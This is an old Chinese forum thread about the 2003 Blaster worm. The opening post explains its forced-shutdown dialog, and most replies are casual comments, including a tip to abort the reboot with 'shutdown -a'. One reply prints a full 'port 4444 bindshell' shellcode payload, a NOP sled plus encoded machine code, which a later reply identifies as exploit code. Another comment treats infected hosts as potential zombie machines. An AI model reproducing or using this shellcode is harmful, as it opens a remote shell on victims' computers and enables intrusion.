工大后院

 找回密码
 加入后院

扫一扫,访问微社区

QQ登录

只需一步,快速开始

搜索
查看: 2095|回复: 19

我把冲击波病毒源代码贴出来大家研究一下吧

[复制链接]
发表于 2003-8-29 03:10 | 显示全部楼层 |阅读模式
其实这个病毒也没有什么破坏力,但他的扫描能力和入侵能力还是很厉害的,大家可能基本上都见到了中毒计算机的屏幕上出现一个对话框,提示系统要关机,其实这个也很简单,大家不用中病毒就可以来试验一下的,在2000,NT,XP中有一个系统应用程序叫shutdown.exe ,他是提供系统自动关机的应用程序,在98里是没有的。这就是这个东西只能感染2000,NT,XP等的原因。
发表于 2003-8-29 10:40 | 显示全部楼层
那表里面好像没Windows XP(chinese)的啊

还有那chineese和japaneese都多了个e的?(无聊中)


[此贴子已经被作者于2003-8-29 2:41:18编辑过]

回复

使用道具 举报

发表于 2003-9-6 23:18 | 显示全部楼层
以后几年将是黑客病毒和安全防卫的斗争,我很拭目以待!!!
回复

使用道具 举报

发表于 2003-9-11 01:36 | 显示全部楼层
有一个方法可以在中招后不用重启:运行  shutdown -a
当然,只是暂时的,要彻底解决还要拿针线把系统补好
回复

使用道具 举报

发表于 2003-9-18 07:22 | 显示全部楼层
8懂
回复

使用道具 举报

发表于 2003-9-18 12:14 | 显示全部楼层
老兄!你不去微软真可惜啊
回复

使用道具 举报

发表于 2003-9-22 17:37 | 显示全部楼层
楼主好有研究哦,唔做黑客晒左。。。
回复

使用道具 举报

发表于 2003-9-23 21:02 | 显示全部楼层
病毒作者并没有做多少工作,还是拿人家的代码加了点枝叶就成了.
还搞的网上大片主机的加固,可惜了这些有潜力的肉鸡啊......
回复

使用道具 举报

发表于 2003-12-24 13:48 | 显示全部楼层
top head!
佩服ing
回复

使用道具 举报

发表于 2004-3-14 10:28 | 显示全部楼层
不知道作者对于这些端口的机器代码是在哪里获得的??是通过扫描工具获得的吗?
回复

使用道具 举报

发表于 2004-3-18 00:58 | 显示全部楼层
不会写shell code 基本不知道是什么东西 其他就基本懂~~
回复

使用道具 举报

发表于 2004-5-14 12:45 | 显示全部楼层
看不懂,唉
回复

使用道具 举报

发表于 2004-5-14 18:09 | 显示全部楼层
运行后……糟糕……
回复

使用道具 举报

发表于 2004-5-14 21:35 | 显示全部楼层
/* port 4444 bindshell */
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\xae\x6e\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04";
回复

使用道具 举报

发表于 2004-5-17 11:24 | 显示全部楼层
Originally posted by rockwhy at 2004-5-14 06:09 PM:
运行后……糟糕……


有何现象??????
回复

使用道具 举报

发表于 2004-5-24 10:24 | 显示全部楼层
只看到好多数字
回复

使用道具 举报

发表于 2004-8-3 05:02 | 显示全部楼层
汗题目。。。“。。大家研究。。”。。。。。
谁能研究吓?楼主研究了吗?
回复

使用道具 举报

发表于 2004-8-3 11:14 | 显示全部楼层
睇到眼都花
回复

使用道具 举报

发表于 2004-9-7 20:36 | 显示全部楼层
晕!这个不是病毒源代码,是exp
回复

使用道具 举报

发表于 2004-9-25 20:32 | 显示全部楼层
比天书还要天书的东西!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 加入后院

本版积分规则

QQ|Archiver|手机版|小黑屋|广告业务Q|工大后院 ( 粤ICP备10013660号 )

GMT+8, 2024-5-16 00:59

Powered by Discuz! X3.5

Copyright © 2001-2024 Tencent Cloud.

快速回复 返回顶部 返回列表